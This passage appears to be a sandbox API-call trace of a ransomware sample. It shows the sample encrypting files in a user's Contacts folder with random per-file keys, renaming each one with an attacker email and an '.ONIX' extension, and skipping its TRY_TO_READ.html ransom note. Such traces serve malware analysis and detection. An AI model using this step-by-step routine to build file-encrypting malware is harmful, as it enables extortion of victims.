[0119.994] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.994] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.994] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0119.994] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.994] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0119.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.994] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.994] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.994] GetLastError () returned 0x0 [0119.994] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0119.994] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.994] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x19c, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.994] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0119.994] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.994] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.994] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.994] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", dwFileAttributes=0x80) returned 1 [0119.995] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 51 [0119.995] GetProcessHeap () returned 0x410000 [0119.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x460008 [0119.995] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" [0119.995] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.995] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=412) returned 1 [0119.995] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x19c [0119.995] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.995] GetProcessHeap () returned 0x410000 [0119.995] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.995] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.995] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.997] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.998] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x19c) returned 0x442938 [0119.999] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x19c) returned 0x46a0f0 [0119.999] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.999] ReadFile (in: hFile=0x4a0, lpBuffer=0x442938, nNumberOfBytesToRead=0x19c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x19c, lpOverlapped=0x0) returned 1 [0120.000] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-412, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.000] WriteFile (in: hFile=0x4a0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x19c, lpOverlapped=0x0) returned 1 [0120.001] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x442938 | out: hHeap=0x410000) returned 1 [0120.001] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a0f0 | out: hHeap=0x410000) returned 1 [0120.001] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x19c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.001] CloseHandle (hObject=0x4a0) returned 1 [0120.002] GetProcessHeap () returned 0x410000 [0120.002] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.002] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.005] GetProcessHeap () returned 0x410000 [0120.005] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0120.005] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.005] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.005] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d858 | out: hHeap=0x410000) returned 1 [0120.005] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0120.005] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.005] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.005] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.005] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.005] GetLastError () returned 0x0 [0120.005] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0120.006] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.006] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x496, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.006] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.006] ReadFile (in: hFile=0x4a0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.007] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.007] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.008] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.008] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.008] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x80) returned 1 [0120.008] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 61 [0120.008] GetProcessHeap () returned 0x410000 [0120.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x449878 [0120.008] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0120.008] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.008] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1174) returned 1 [0120.008] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x496 [0120.008] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.008] GetProcessHeap () returned 0x410000 [0120.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.008] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.008] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.010] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.011] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.012] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x496) returned 0x4d8b68 [0120.012] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x496) returned 0x4d9008 [0120.012] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.012] ReadFile (in: hFile=0x4a0, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x496, lpOverlapped=0x0) returned 1 [0120.012] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-1174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.012] WriteFile (in: hFile=0x4a0, lpBuffer=0x4d9008*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9008*, lpNumberOfBytesWritten=0x367f44c*=0x496, lpOverlapped=0x0) returned 1 [0120.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.014] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9008 | out: hHeap=0x410000) returned 1 [0120.014] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x496, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.014] CloseHandle (hObject=0x4a0) returned 1 [0120.015] GetProcessHeap () returned 0x410000 [0120.015] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.015] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.017] GetProcessHeap () returned 0x410000 [0120.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.017] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0120.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.017] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.017] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.017] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.017] GetLastError () returned 0x0 [0120.017] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a0 [0120.018] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.018] LockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x494, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.018] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.018] ReadFile (in: hFile=0x4a0, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.020] SetFilePointerEx (in: hFile=0x4a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.020] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.020] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0120.020] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0120.020] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x80) returned 1 [0120.020] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 61 [0120.020] GetProcessHeap () returned 0x410000 [0120.020] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x449878 [0120.020] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0120.020] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.020] GetFileSizeEx (in: hFile=0x4a0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1172) returned 1 [0120.021] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x494 [0120.021] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.021] GetProcessHeap () returned 0x410000 [0120.021] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0120.021] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.021] WriteFile (in: hFile=0x4a0, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.025] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.026] WriteFile (in: hFile=0x4a0, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.027] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x494) returned 0x4d8b68 [0120.027] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x494) returned 0x4d9008 [0120.027] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.027] ReadFile (in: hFile=0x4a0, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x494, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x494, lpOverlapped=0x0) returned 1 [0120.027] SetFilePointer (in: hFile=0x4a0, lDistanceToMove=-1172, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.027] WriteFile (in: hFile=0x4a0, lpBuffer=0x4d9008*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9008*, lpNumberOfBytesWritten=0x367f44c*=0x494, lpOverlapped=0x0) returned 1 [0120.028] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0120.028] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9008 | out: hHeap=0x410000) returned 1 [0120.028] UnlockFile (hFile=0x4a0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x494, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.028] CloseHandle (hObject=0x4a0) returned 1 [0120.029] GetProcessHeap () returned 0x410000 [0120.029] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.029] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.031] GetProcessHeap () returned 0x410000 [0120.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0120.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0120.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458a78 | out: hHeap=0x410000) returned 1 [0120.031] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0120.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b00 | out: hHeap=0x410000) returned 1 [0120.031] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0120.031] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0120.031] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0120.032] GetLastError () returned 0x0 [0120.032] FindNextFileW (in: hFindFile=0x48ed70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0120.032] CloseHandle (hObject=0x3cc) returned 1 [0120.032] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.032] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x3b, wMilliseconds=0x19f)) [0120.032] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 